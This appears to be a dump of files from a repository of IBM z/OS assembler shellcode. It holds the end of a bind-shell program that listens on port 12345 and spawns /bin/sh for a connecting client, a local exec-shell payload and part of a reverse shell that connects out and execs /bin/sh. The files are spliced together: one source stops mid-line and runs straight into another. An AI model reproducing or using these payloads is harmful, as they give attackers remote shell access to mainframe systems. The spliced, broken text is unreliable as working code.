***********************************************************************
* *
* CONVAE - convert CLIBUF ascii to ebcdic *
* function looks up ascii byte and returns ebcdic *
* expects return address in R14 *
* *
***********************************************************************
CONVAE   LHI   6,1                 # R6 has number 1
         L     4,BREAD             # num of bytes read
         L     1,CLIBUF            # address of cli sock input
LOOP1    L     2,A2E               # address of a2e buff
         SR    2,6                 # subtract 1 from R2 addr
         LB    3,0(0,1)            # Load byte from cli into R3
         NILF  3,X'FF'             # make sure R3 is 1 positive byte
         AR    2,3                 # add ascii val to a2e buff
         LB    3,0(0,2)            # load byte from a2e buff into R3
         NILF  3,X'FF'             # make sure R3 is 1 positive byte
         STC   3,0(0,1)            # store R3 byte back into cli buff
         AR    1,6                 # increment client buff
         SR    4,6                 # sub 1 from ctr, loop while non-zero
         BRC   7,LOOP1             # loop
         BCR   15,14               # return to caller

***********************************************************************
* *
* CONVEA - convert CLIBUF ebcdic to ascii *
* function looks up ebcdic byte and returns ascii *
* expects return address in R14 *
* *
***********************************************************************
CONVEA   LHI   6,1                 # R6 has number 1
         L     4,BREAD             # num of bytes read
         L     1,CLIBUF            # address of cli sock input
LOOP2    L     2,E2A               # address of e2a buff
         SR    2,6                 # subtract 1 from R2 addr
         LB    3,0(0,1)            # Load byte from cli into R3
         NILF  3,X'FF'             # make sure R3 is 1 positive byte
         AR    2,3                 # add ebcdic val to e2a buff
         LB    3,0(0,2)            # load byte from e2a buff into R3
         STC   3,0(0,1)            # store R3 byte back into cli buff
         NILF  3,X'FF'             # make sure R3 is 1 positive byte
         AR    1,6                 # increment client buff
         SR    4,6                 # sub 1 from ctr, loop while non-zero
         BRC   7,LOOP2             # loop
         BCR   15,14               # return to caller

****************************************************
* cleanup & exit *
* preload R15 with exit code *
****************************************************
GOODEX   XR    15,15               # zero return code
EXITP    ST    15,0(,11)
         L     13,4(,11)
         LM    14,12,12(13)        # restore registers
         LARL  5,SAVEAREA
         L     15,0(0,5)
         BCR   15,14               # branch to caller

**********************
**********************
* *
* Constant Sections *
* *
**********************
**********************
@CONST   DS    0F                  # constants full word boundary
SAVEAREA DC    X'00000000'
         DC    X'00000000'
ALET     DC    F'0'
O_NONBLOCK EQU X'04'               # bit for nonblocking io
EWOULDBLOCK EQU X'44E'             # rtncod for nonblk read sock
EAGAIN   EQU   X'70'               # rtncod for nonblk, not thr
*************************
* Function addresses * # pipe variables
*************************
FFUNC    DC    A(BFRK)             # address of first function
NUMFUNC  DC    F'11'               # number of funcs listed below
BFRK     DC    CL8'BPX1FRK '       # Fork
BEXC     DC    CL8'BPX1EXC '       # Exec
BSOC     DC    CL8'BPX1SOC '       # Socket
BBND     DC    CL8'BPX1BND '       # Bind
BLSN     DC    CL8'BPX1LSN '       # Listen
BACP     DC    CL8'BPX1ACP '       # Accept
BRED     DC    CL8'BPX1RED '       # Read
BWRT     DC    CL8'BPX1WRT '       # Write
BCLO     DC    CL8'BPX1CLO '       # Close
BFCT     DC    CL8'BPX1FCT '       # Fcntl
BPIP     DC    CL8'BPX1PIP '       # Pipe
*************************
* Socket conn variables * # functions used by pgm
*************************
LISTSOCK DC    XL2'3039'           # port 12345
LISTADDR DC    XL4'00000000'       # address 0.0.0.0
BACKLOG  DC    F'1'                # 1 byte backlog
DOM      DC    A(AF_INET)          # AF_INET = 2
TYPE     DC    A(SOCK#_STREAM)     # stream = 1
PROTO    DC    A(IPPROTO_IP)       # ip = 0
DIM      DC    A(SOCK#DIM_SOCKET)  # dim_sock = 1
SRVFD    DC    A(*)                # server FD
SRVSKT   DC    16XL1'77'           # srv socket struct
SOCKLEN  DC    A(SOCK#LEN+SOCK_SIN#LEN)
CLILEN   DC    A(*)                # len of client struct
CLISKT   DC    16XL1'88'           # client socket struct
CLIFD    DC    A(*)                # client fd
************************
* BPX1PIP vars ********* # pipe variables
************************
CFDR     DC    F'0'                # child proc FD read
CFDW     DC    F'0'                # child proc FD write
PFDR     DC    F'0'                # parent proc FD read
PFDW     DC    F'0'                # parent proc FD write
************************
* BPX1FRK vars *********
************************
CPROCN   DC    F'-1'               # child proc #
************************
* BPX1EXC vars *********
************************
EXCMD    DC    CL7'/bin/sh'        # command to exec
EXCMDL   DC    A(L'EXCMD)          # len of cmd to exec
EXARGC   DC    F'1'                # num of arguments
EXARG1   DC    CL2'sh'             # arg 1 to exec
EXARG1L  DC    A(L'EXARG1)         # len of arg1
EXARGL   DC    A(EXARG1)           # addr of argument list
EXARGLL  DC    A(EXARG1L)          # addr of arg len list
EXENVC   DC    F'0'                # env var count
EXENVL   DC    F'0'                # env var arg list addr
EXENVLL  DC    F'0'                # env var arg len addr
EXITRA   DC    F'0'                # exit routine addr
EXITPLA  DC    F'0'                # exit rout parm list addr
**************************
* Socket read/write vars *
**************************
CLIREAD  DC    F'52'               # one less than buf
CLIBUF   DC    A(@CBUF)            # buff for read cli sock
@CBUF    DC    XL52'22'            # buffer for bytes read
BREAD    DC    F'0'                # bytes read
BWRIT    DC    F'0'                # bytes written
*********************
* Return value vars *
*********************
RTN_VAL  DC    A(*)                # return value
RTN_COD  DC    A(*)                # return code
RSN_COD  DC    A(*)                # reason code
***************************
***** end of constants ****
***************************
****************************************************
* ebcdic to ascii lookup *
* read hex(ebcdic char) bytes from beginning of *
* array to get ascii byte *
****************************************************
E2ABUF   DC    X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX
               1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X
               98999a9b14159e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX
               e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX
               f8c9cacbc8cdcecfcc603a2340273d22'
         DC    X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX
               bae6b8c6a4b57e737475767778797aa1bfd05bdeaeaca3a5b7a9a7b6X
               bcbdbedda8af5db4d77b414243444546474849adf4f6f2f3f57d4a4bX
               4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X
               d530313233343536373839b3dbdcd9da'
         DC    X'9f'
E2A      DC    A(E2ABUF)
****************************************************
* ascii to ebcdic lookup *
* read hex(ascii char) bytes from beginning of *
* array to get ebcdic byte *
****************************************************
A2EBUF   DC    X'010203372d2e2f1605150b0c0d0e0f101112133c3d322618193f27X
               1c1d1e1f405a7f7b5b6c507d4d5d5c4e6b604b61f0f1f2f3f4f5f6f7X
               f8f97a5e4c7e6e6f7cc1c2c3c4c5c6c7c8c9d1d2d3d4d5d6d7d8d9e2X
               e3e4e5e6e7e8e9ade0bd5f6d79818283848586878889919293949596X
               979899a2a3a4a5a6a7a8a9c04fd0a107'
         DC    X'202122232425061728292a2b2c090a1b30311a333435360838393aX
               3b04143eff41aa4ab19fb26ab5bbb49a8ab0caafbc908feafabea0b6X
               b39dda9b8bb7b8b9ab6465626663679e687471727378757677ac69edX
               eeebefecbf80fdfefbfcbaae594445424643479c4854515253585556X
               578c49cdcecbcfcce170dddedbdc8d8e'
         DC    X'df'
A2E      DC    A(A2EBUF)
         BPXYSOCK LIST=YES         # MACRO MAP for socket structure
         BPXYFCTL LIST=YES         # MACRO MAP for fcntl structure
         END   @SETUP
--------------------------------------------------------------------------------
/bind-shell/shell_bind.s.asc:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/local-exec-shell/local_shell.s:
--------------------------------------------------------------------------------
         TITLE 'pop shell for shell code'
NSHELL   CSECT
NSHELL   AMODE 31
NSHELL   RMODE ANY
         ENTRY MAIN
MAIN     DS    0F
         STM   14,12,12(13)        # save our registers
         LARL  15,MAIN
         LR    8,15
         USING MAIN,8              # give us some addressability
         LARL  11,SAVEAREA         # sa address
         ST    13,0(,11)           # save caller's save area
         LR    13,11
         DS    0H
         BRAS  0,BEGIN
FNAME    DC    C'BPX1EXC '
         DC    X'0'
BEGIN    LARL  0,FNAME
         XR    1,1
         SVC   8
         ST    0,GETENTRY          # GETENTRY addr of bpx1exc call
         L     15,GETENTRY
         LA    6,FULLARG           # FULLARG is arg stack for func call
         LR    1,6                 # R1 has base of FULLARG for later call
***********************************************************************
* What follows is the arguments for the BPX1EXC callable service *
* built like this for compaction of the code *
* "args" refer to the args of the BPX1EXC call itself *
* "parms" refer to the parameters of the exec'd cmd (here /bin/sh) *
* *
***********************************************************************
         LA    7,PATHLEN
         ST    7,0(,6)             # store its addr in first slot
         LA    7,PATH
         ST    7,4(,6)
         LA    7,ARGC
         ST    7,8(,6)
* list of addresses of parms lengths
         LA    7,ARGLL             # ARGLL - arg 4
         ST    7,12(,6)
* individual parms lengths
         LA    9,ARG1L             # shell parm len 1
         ST    9,0(,7)             # store in length list slot 1
         LA    9,ARG2L             # arg2 len 2
         ST    9,4(,7)             # store in length list slot 2
         LA    9,ARG3L             # arg3 len 16
         ST    9,8(,7)             # store in length list slot 3
* list of addresses of parms
         LA    7,ARGLIST           # ARGLIST - arg 5
         ST    7,16(,6)
* individual parms
         LA    9,ARG1              # parm1 is null
         ST    9,0(,7)
         LA    9,ARG2              # parm2 is "-c"
         ST    9,4(,7)
         LA    9,ARG3              # parm3 ensures valid stdin
         ST    9,8(,7)
* 0 is used for the last 8 args ENVC,ENVLL,ENVLIST,EXITADR,
* EXITPGM,RTNVAL,RTNCODE,RSNCODE
         LA    7,ZERO
         ST    7,20(,6)
         ST    7,24(,6)
         ST    7,28(,6)
         ST    7,32(,6)
         ST    7,36(,6)
         ST    7,40(,6)
         ST    7,44(,6)
* for last arg need to add 0x80000000 (per asm callable svcs)
         XILF  7,X'80000000'
         ST    7,48(,6)
         AHI   6,4
GO       BALR  14,15
* cleanup
         L     13,0(,11)
         LM    14,12,12(13)        # restore registers
         XR    15,15               # zero return code
         BCR   15,14               # branch to caller
         DS    0F                  # constants area
GETENTRY DC    X'00000000'
SAVEAREA DC    X'00000000'
PATHLEN  DC    F'7'                # PATHLEN - arg 1
PATH     DC    C'/bin/sh'          # PATH - arg 2
ARGC     DC    F'3'                # ARGC - arg 3
ARG1     DC    XL1'0'
ARG2     DC    CL2'-c'
ARG3 DC C'/bin/sh R7=0 *
* for close, set R2=F_CLOSFD *
* R5=R6 = fd to close (optionally R5 & R6 can be a range *
* of FDs to close) *
* *
***********************************************************************
LFCNTL   L     15,BFCT             # load func addr to 15
         ST    14,SAVEAREA         # save return address
         ST    5,@FFD              # fd to be duplicated
         ST    2,@ACT              # action field for BPX1FCT
         ST    6,@ARG              # r6 should have the biggest fd
         BRAS  0,@FCTL
@FFD     DC    F'0'
@ACT     DC    F'0'
@ARG     DC    F'0'
@RETFD   DC    F'0'
@FCTL    CALL  (15),(@FFD,@ACT,@ARG,@RETFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
         LHI   15,11               # exit code for this func
         L     7,@RETFD            # set r7 to rtn val
         CIB   7,-1,8,EXITP        # r7 = -1 exit
         L     14,SAVEAREA         # reload ret address
         BCR   15,14               # return to caller

****************************************************
* cleanup & exit *
* preload R15 with exit code *
****************************************************
GOODEX   XR    15,15               # zero return code
EXITP    ST    15,0(,11)
         L     13,4(,11)
         LM    14,12,12(13)        # restore registers
         LARL  5,SAVEAREA
         L     15,0(0,5)
         BCR   15,14               # branch to caller

**********************
**********************
* *
* Constant Sections *
* *
**********************
**********************
@CONST   DS    0F                  # constants full word boundary
SAVEAREA DC    X'00000000'
         DC    X'00000000'
ALET     DC    F'0'
*************************
* Function addresses * # pipe variables
*************************
FFUNC    DC    A(BSOC)             # address of first function
NUMFUNC  DC    F'5'                # number of funcs listed below
BSOC     DC    CL8'BPX1SOC '       # Socket
BBND     DC    CL8'BPX1BND '       # Bind
BCON     DC    CL8'BPX1CON '       # Connect
BFCT     DC    CL8'BPX1FCT '       # Fcntl
BEXC     DC    CL8'BPX1EXC '       # Exec
*************************
* Socket conn variables * # functions used by pgm
*************************
CONNSOCK DC    XL2'3039'           # port 12345
CONNADDR DC    XL4'00000000'       # address 0.0.0.0
BACKLOG  DC    F'1'                # 1 byte backlog
DOM      DC    A(AF_INET)          # AF_INET = 2
TYPE     DC    A(SOCK#_STREAM)     # stream = 1
PROTO    DC    A(IPPROTO_IP)       # ip = 0
DIM      DC    A(SOCK#DIM_SOCKET)  # dim_sock = 1
SRVSKT   DC    16XL1'77'           # srv socket struct
SOCKLEN  DC    A(SOCK#LEN+SOCK_SIN#LEN)
CLILEN   DC    A(*)                # len of client struct
CLISKT   DC    16XL1'88'           # client socket struct
CLIFD    DC    A(*)                # client fd
************************
* BPX1EXC vars *********
************************
EXCMD    DC    CL7'/bin/sh'        # command to exec
EXCMDL   DC    A(L'EXCMD)          # len of cmd to exec
EXARGC   DC    F'1'                # num of arguments
EXARG1   DC    CL2'sh'             # arg 1 to exec
EXARG1L  DC    A(L'EXARG1)         # len of arg1
EXARGL   DC    A(EXARG1)           # addr of argument list
EXARGLL  DC    A(EXARG1L)          # addr of arg len list
EXENVC   DC    F'0'                # env var count
EXENVL   DC    F'0'                # env var arg list addr
EXENVLL  DC    F'0'                # env var arg len addr
EXITRA   DC    F'0'                # exit routine addr
EXITPLA  DC    F'0'                # exit rout parm list addr
*********************
* Return value vars *
*********************
RTN_VAL  DC    A(*)                # return value
RTN_COD  DC    A(*)                # return code
RSN_COD  DC    A(*)                # reason code
***************************
***** end of constants ****
***************************
         BPXYSOCK LIST=YES         # MACRO MAP for socket structure
         BPXYFCTL LIST=YES         # MACRO MAP for fcntl structure
         END   @SETUP
--------------------------------------------------------------------------------
/reverse-shell/reverse-shell-noenc.s.asc:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/reverse-shell/sr_shellcode.txt:
--------------------------------------------------------------------------------
# length 390
--------------------------------------------------------------------------------